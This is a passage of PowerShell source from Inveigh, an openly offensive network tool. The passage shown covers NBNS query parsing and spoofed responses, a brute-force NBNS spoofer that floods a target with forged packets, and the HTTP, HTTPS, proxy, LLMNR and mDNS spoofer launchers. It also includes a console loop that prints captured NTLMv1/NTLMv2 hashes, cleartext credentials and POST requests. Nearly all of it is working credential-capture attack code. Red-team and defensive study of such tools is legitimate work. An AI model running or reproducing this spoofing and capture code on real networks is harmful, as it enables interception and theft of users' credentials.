$NBNS_query_type = [System.BitConverter]::ToString($NBNS_request_data[43..44])
switch ($NBNS_query_type)
{
'41-41'
{
$NBNS_query_type = "00"
}
'41-44'
{
$NBNS_query_type = "03"
}
'43-41'
{
$NBNS_query_type = "20"
}
'42-4C'
{
$NBNS_query_type = "1B"
}
'42-4D'
{
$NBNS_query_type = "1C"
}
'42-4E'
{
$NBNS_query_type = "1D"
}
'42-4F'
{
$NBNS_query_type = "1E"
}
}
$NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)])
$NBNS_query = $NBNS_query -replace "-00",""
$NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
$NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
$NBNS_query_string_subtracted = ""
$NBNS_query_string = ""
$n = 0
do
{
$NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
$NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
$n += 1
}
until($n -gt ($NBNS_query_string_encoded.Length - 1))
$n = 0
do
{
$NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
$n += 2
}
until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
if(!$Inspect -and ($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
$inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP) -and ($NBNSTypes -contains $NBNS_query_type) -and ($source_IP -ne $IP))
{
$NBNS_destination_endpoint = New-Object System.Net.IPEndpoint($NBNS_listener_endpoint.Address,137)
$NBNS_UDP_client.Connect($NBNS_destination_endpoint)
$NBNS_UDP_client.Send($NBNS_response_packet,$NBNS_response_packet.Length)
$NBNS_UDP_client.Close()
$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
$NBNS_response_message = "- response sent"
}
else
{
if($Inspect)
{
$NBNS_response_message = "- inspect only"
}
elseif($NBNSTypes -notcontains $NBNS_query_type)
{
$NBNS_response_message = "- disabled NBNS type"
}
elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
{
$NBNS_response_message = "- $NBNS_query_string is not on reply list"
}
elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)
{
$NBNS_response_message = "- $NBNS_query_string is on ignore list"
}
elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
{
$NBNS_response_message = "- $source_IP is not on reply list"
}
elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
{
$NBNS_response_message = "- $source_IP is on ignore list"
}
elseif($inveigh.IP_capture_list -contains $source_IP)
{
$NBNS_response_message = "- previous capture from $source_IP"
}
elseif($source_IP -eq $IP)
{
$NBNS_response_message = "- local request"
}
else
{
$NBNS_response_message = "- something went wrong"
}
}
if($NBNS_request_data)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
}
}
$NBNS_request_data = ""
}
}
$NBNS_UDP_client.Close()
}
$NBNS_bruteforce_spoofer_scriptblock =
{
param ($SpooferIP,$NBNSBruteForceHost,$NBNSBruteForceTarget,$NBNSBruteForcePause,$NBNSTTL)
$NBNSBruteForceHost = $NBNSBruteForceHost.ToUpper()
$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($NBNSBruteForceHost)
$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
$hostname_encoded = $hostname_encoded.Replace("-","")
$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
[Array]::Reverse($NBNS_TTL_bytes)
for($i=0; $i -lt $hostname_encoded.Count; $i++)
{
if($hostname_encoded[$i] -gt 64)
{
$hostname_bytes[$i] = $hostname_encoded[$i] + 10
}
else
{
$hostname_bytes[$i] = $hostname_encoded[$i] + 17
}
}
$NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
$hostname_bytes +
0x00,0x20,0x00,0x01 +
$NBNS_TTL_bytes +
0x00,0x06,0x00,0x00 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
0x00,0x00,0x00,0x00
$inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
$NBNS_paused = $false
$NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137)
$destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget)
$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
$NBNS_bruteforce_UDP_client.Connect($destination_point)
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
}
while($inveigh.running)
{
:NBNS_spoofer_loop while (!$inveigh.hostname_spoof -and $inveigh.running)
{
if($NBNS_paused)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
$NBNS_paused = $false
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
}
}
for ($i = 0; $i -lt 255; $i++)
{
for ($j = 0; $j -lt 255; $j++)
{
$NBNS_response_packet[0] = $i
$NBNS_response_packet[1] = $j
$NBNS_bruteforce_UDP_client.send($NBNS_response_packet,$NBNS_response_packet.Length)
if($inveigh.hostname_spoof -and $NBNSBruteForcePause)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
$NBNS_paused = $true
break NBNS_spoofer_loop
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
}
}
}
}
}
Start-Sleep -m 5
}
$NBNS_bruteforce_UDP_client.Close()
}
$control_scriptblock =
{
param ($ConsoleQueueLimit,$NBNSBruteForcePause,$RunCount,$RunTime)
$inveigh.control = $true
function StopInveigh
{
param ([String]$exit_message)
if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
try
{
$certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
$certificate_store.Open('ReadWrite')
$certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
ForEach($certificate in $certificates)
{
$certificate_store.Remove($certificate)
}
$certificate_store.Close()
}
catch
{
$inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
}
}
}
if($inveigh.running)
{
Start-Sleep -S 1
$inveigh.console_queue.Add("Inveigh exited due to $exit_message at $(Get-Date -format 's')")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
}
Start-Sleep -S 1
$inveigh.running = $false
}
if($inveigh.relay_running)
{
Start-Sleep -S 1
$inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
}
Start-Sleep -S 1
$inveigh.relay_running = $false
}
$inveigh.HTTPS = $false
}
if($NBNSBruteForcePause)
{
$NBNS_pause = New-TimeSpan -Seconds $NBNSBruteForcePause
}
$run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count
$run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count
$run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count
if($RunTime)
{
$control_timeout = New-TimeSpan -Minutes $RunTime
$control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
}
while($inveigh.running)
{
if($NBNSBruteForcePause -and $inveigh.hostname_spoof)
{
if($inveigh.NBNS_stopwatch.Elapsed -ge $NBNS_pause)
{
$inveigh.hostname_spoof = $false
}
}
if($RunCount)
{
if($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext)
{
StopInveigh "run count"
}
}
if($RunTime)
{
if($control_stopwatch.Elapsed -ge $control_timeout)
{
StopInveigh "run time"
}
}
if($inveigh.file_output)
{
while($inveigh.log_file_queue.Count -gt 0)
{
$inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
$inveigh.log_file_queue.RemoveAt(0)
}
while($inveigh.NTLMv1_file_queue.Count -gt 0)
{
$inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
$inveigh.NTLMv1_file_queue.RemoveAt(0)
}
while($inveigh.NTLMv2_file_queue.Count -gt 0)
{
$inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
$inveigh.NTLMv2_file_queue.RemoveAt(0)
}
while($inveigh.cleartext_file_queue.Count -gt 0)
{
$inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
$inveigh.cleartext_file_queue.RemoveAt(0)
}
while($inveigh.POST_request_file_queue.Count -gt 0)
{
$inveigh.POST_request_file_queue[0]|Out-File $inveigh.POST_request_out_file -Append
$inveigh.POST_request_file_queue.RemoveAt(0)
}
}
if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0)
{
while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output)
{
$inveigh.console_queue.RemoveAt(0)
}
}
Start-Sleep -m 5
}
$inveigh.control = $false
}
function HTTPListener()
{
$proxy_listener = $false
$HTTPS_listener = $false
$HTTP_runspace = [RunspaceFactory]::CreateRunspace()
$HTTP_runspace.Open()
$HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$HTTP_powershell = [PowerShell]::Create()
$HTTP_powershell.Runspace = $HTTP_runspace
$HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
$HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument($HTTPResponse).AddArgument(
$HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument($Proxy).AddArgument(
$ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument(
$WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
Start-Sleep -m 50
function HTTPSListener()
{
$proxy_listener = $false
$HTTPS_listener = $true
$HTTPS_runspace = [RunspaceFactory]::CreateRunspace()
$HTTPS_runspace.Open()
$HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$HTTPS_powershell = [PowerShell]::Create()
$HTTPS_powershell.Runspace = $HTTPS_runspace
$HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
$HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument($HTTPResponse).AddArgument(
$HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument($Proxy).AddArgument(
$ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument(
$WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTPS_powershell.BeginInvoke() > $null
}
Start-Sleep -m 50
function ProxyListener()
{
$proxy_listener = $true
$HTTPS_listener = $false
$proxy_runspace = [RunspaceFactory]::CreateRunspace()
$proxy_runspace.Open()
$proxy_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$proxy_powershell = [PowerShell]::Create()
$proxy_powershell.Runspace = $proxy_runspace
$proxy_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
$HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument($HTTPResponse).AddArgument(
$HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument($Proxy).AddArgument(
$ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument(
$WPADAuthIgnore).AddArgument($WPADResponse) > $null
$proxy_powershell.BeginInvoke() > $null
}
function SnifferSpoofer()
{
$sniffer_runspace = [RunspaceFactory]::CreateRunspace()
$sniffer_runspace.Open()
$sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$sniffer_powershell = [PowerShell]::Create()
$sniffer_powershell.Runspace = $sniffer_runspace
$sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($IP).AddArgument($LLMNR).AddArgument(
$LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument(
$mDNS_response_message).AddArgument($mDNSTypes).AddArgument($mDNSTTL).AddArgument(
$NBNS).AddArgument($NBNS_response_message).AddArgument($NBNSTypes).AddArgument($NBNSTTL).AddArgument(
$SMB).AddArgument($SpooferHostsIgnore).AddArgument($SpooferHostsReply).AddArgument(
$SpooferIP).AddArgument($SpooferIPsIgnore).AddArgument($SpooferIPsReply).AddArgument(
$SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval) > $null
$sniffer_powershell.BeginInvoke() > $null
}
function LLMNRSpoofer()
{
$LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$LLMNR_spoofer_runspace.Open()
$LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$LLMNR_spoofer_powershell = [PowerShell]::Create()
$LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace
$LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument(
$SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
$LLMNRTTL) > $null
$LLMNR_spoofer_powershell.BeginInvoke() > $null
}
function mDNSSpoofer()
{
$mDNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$mDNS_spoofer_runspace.Open()
$mDNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$mDNS_spoofer_powershell = [PowerShell]::Create()
$mDNS_spoofer_powershell.Runspace = $mDNS_spoofer_runspace
$mDNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$mDNS_spoofer_powershell.AddScript($mDNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$mDNS_response_message).AddArgument($mDNSTTL).AddArgument($mDNSTypes).AddArgument($SpooferIP).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
$SpooferIPsIgnore) > $null
$mDNS_spoofer_powershell.BeginInvoke() > $null
}
function NBNSSpoofer()
{
$NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$NBNS_spoofer_runspace.Open()
$NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$NBNS_spoofer_powershell = [PowerShell]::Create()
$NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace
$NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$NBNS_response_message).AddArgument($SpooferIP).AddArgument($NBNSTypes).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
$SpooferIPsIgnore).AddArgument($NBNSTTL) > $null
$NBNS_spoofer_powershell.BeginInvoke() > $null
}
function NBNSBruteForceSpoofer()
{
$NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$NBNS_bruteforce_spoofer_runspace.Open()
$NBNS_bruteforce_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$NBNS_bruteforce_spoofer_powershell = [PowerShell]::Create()
$NBNS_bruteforce_spoofer_powershell.Runspace = $NBNS_bruteforce_spoofer_runspace
$NBNS_bruteforce_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$NBNS_bruteforce_spoofer_powershell.AddScript($NBNS_bruteforce_spoofer_scriptblock).AddArgument(
$SpooferIP).AddArgument($NBNSBruteForceHost).AddArgument($NBNSBruteForceTarget).AddArgument(
$NBNSBruteForcePause).AddArgument($NBNSTTL) > $null
$NBNS_bruteforce_spoofer_powershell.BeginInvoke() > $null
}
function ControlLoop()
{
$control_runspace = [RunspaceFactory]::CreateRunspace()
$control_runspace.Open()
$control_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$control_powershell = [PowerShell]::Create()
$control_powershell.Runspace = $control_runspace
$control_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$control_powershell.AddScript($control_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
$NBNSBruteForcePause).AddArgument($RunCount).AddArgument($RunTime) > $null
$control_powershell.BeginInvoke() > $null
}
if($HTTP -eq 'Y')
{
HTTPListener
}
if($HTTPS -eq 'Y')
{
HTTPSListener
}
if($Proxy -eq 'Y')
{
ProxyListener
}
if(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y' -or $Inspect) -and $elevated_privilege)
{
SnifferSpoofer
}
elseif(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privilege)
{
if($LLMNR -eq 'Y')
{
LLMNRSpoofer
}
if($mDNS -eq 'Y')
{
mDNSSpoofer
}
if($NBNS -eq 'Y')
{
NBNSSpoofer
}
if($NBNSBruteForce -eq 'Y')
{
NBNSBruteForceSpoofer
}
}
if($NBNSBruteForce -eq 'Y')
{
NBNSBruteForceSpoofer
}
if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $NBNSBruteForcePause -or $RunCount -or $RunTime)
{
ControlLoop
}
try
{
if($inveigh.console_output)
{
if($ConsoleStatus)
{
$console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
$console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
}
:console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
{
while($inveigh.console_queue.Count -gt 0)
{
switch -wildcard ($inveigh.console_queue[0])
{
{$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
if($inveigh.output_stream_only)
{
Write-Output($inveigh.console_queue[0] + $inveigh.newline)
}
else
{
Write-Warning($inveigh.console_queue[0])
}
$inveigh.console_queue.RemoveAt(0)
}
{$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
{
if($ConsoleOutput -eq 'Y')
{
if($inveigh.output_stream_only)
{
Write-Output($inveigh.console_queue[0] + $inveigh.newline)
}
else
{
Write-Output($inveigh.console_queue[0])
}
}
$inveigh.console_queue.RemoveAt(0)
}
{$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
{
if($ConsoleOutput -ne "Low")
{
if($inveigh.output_stream_only)
{
Write-Output($inveigh.console_queue[0] + $inveigh.newline)
}
else
{
Write-Output($inveigh.console_queue[0])
}
}
$inveigh.console_queue.RemoveAt(0)
}
default
{
if($inveigh.output_stream_only)
{
Write-Output($inveigh.console_queue[0] + $inveigh.newline)
}
else
{
Write-Output($inveigh.console_queue[0])
}
$inveigh.console_queue.RemoveAt(0)
}
}
}
if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
{
if($inveigh.cleartext_list.Count -gt 0)
{
Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
$inveigh.cleartext_list.Sort()
foreach($unique_cleartext in $inveigh.cleartext_list)
{
if($unique_cleartext -ne $unique_cleartext_last)
{
Write-Output($unique_cleartext + $inveigh.newline)
}
$unique_cleartext_last = $unique_cleartext
}
Start-Sleep -m 5
}
else
{
Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
}
if($inveigh.POST_request_list.Count -gt 0)
{
Write-Output("$(Get-Date -format 's') - Current unique POST request captures:" + $inveigh.newline)
$inveigh.POST_request_list.Sort()
foreach($unique_POST_request in $inveigh.POST_request_list)
{
if($unique_POST_request -ne $unique_POST_request_last)
{
Write-Output($unique_POST_request + $inveigh.newline)
}
$unique_POST_request_last = $unique_POST_request
}
Start-Sleep -m 5
}
if($inveigh.NTLMv1_list.Count -gt 0)
{
Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
$inveigh.NTLMv1_list.Sort()
foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
{
$unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
{
Write-Output($unique_NTLMv1 + $inveigh.newline)
}
$unique_NTLMv1_account_last = $unique_NTLMv1_account
}
$unique_NTLMv1_account_last = ''
Start-Sleep -m 5
Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
{
Write-Output($NTLMv1_username + $inveigh.newline)
}
Start-Sleep -m 5
}
else
{
Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
}
if($inveigh.NTLMv2_list.Count -gt 0)
{
Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
$inveigh.NTLMv2_list.Sort()
foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
{
$unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
{
Write-Output($unique_NTLMv2 + $inveigh.newline)
}
$unique_NTLMv2_account_last = $unique_NTLMv2_account
}
$unique_NTLMv2_account_last = ''
Start-Sleep -m 5
Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
{
Write-Output($NTLMv2_username + $inveigh.newline)
}
}
else
{
Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
}
$console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
}
if($inveigh.console_input)
{
if([Console]::KeyAvailable)
{
$inveigh.console_output = $false
BREAK console_loop
}
}
Start-Sleep -m 5
}
}
}
finally
{
if($Tool -eq 2)
{
$inveigh.running = $false
}
}
}
function Stop-Inveigh
{
if($inveigh)
{
if($inveigh.running -or $inveigh.relay_running)
{
if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
try
{
$certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
$certificate_store.Open('ReadWrite')
$certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
ForEach($certificate in $certificates)
{
$certificate_store.Remove($certificate)
}
$certificate_store.Close()
}
catch
{
Write-Output("SSL Certificate Deletion Error - Remove Manually")
if($inveigh.file_output)
{
"$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
}
}
}
if($inveigh.relay_running)
{
if($inveigh.file_output)
{
"$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
}
Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
$inveigh.relay_running = $false
}
if($inveigh.running)
{
if($inveigh.file_output)
{
"$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
}
Write-Output("Inveigh exited at $(Get-Date -format 's')")
$inveigh.running = $false
}
$inveigh.HTTPS = $false
Start-Sleep -S 5
}
else
{
Write-Output("There are no running Inveigh functions")
}
}
}
function Get-Inveigh
{
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][Switch]$Cleartext,
[parameter(Mandatory=$false)][Switch]$CleartextUnique,
[parameter(Mandatory=$false)][Switch]$Console,
[parameter(Mandatory=$false)][Switch]$Learning,
[parameter(Mandatory=$false)][Switch]$Log,
[parameter(Mandatory=$false)][Switch]$NTLMv1,
[parameter(Mandatory=$false)][Switch]$NTLMv2,
[parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
[parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
[parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
[parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
[parameter(Mandatory=$false)][Switch]$POSTRequest,
[parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
if($Console -or $PSBoundParameters.Count -eq 0)
{
while($inveigh.console_queue.Count -gt 0)
{
if($inveigh.output_stream_only)
{
Write-Output($inveigh.console_queue[0] + $inveigh.newline)
$inveigh.console_queue.RemoveAt(0)
}
else
{
switch -wildcard ($inveigh.console_queue[0])
{
{$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
}
default
{
Write-Output $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
}
}
}
}
}
if($Log)
{
Write-Output $inveigh.log
}
if($NTLMv1)
{
Write-Output $inveigh.NTLMv1_list
}
if($NTLMv1Unique)
{
$inveigh.NTLMv1_list.Sort()
foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
{
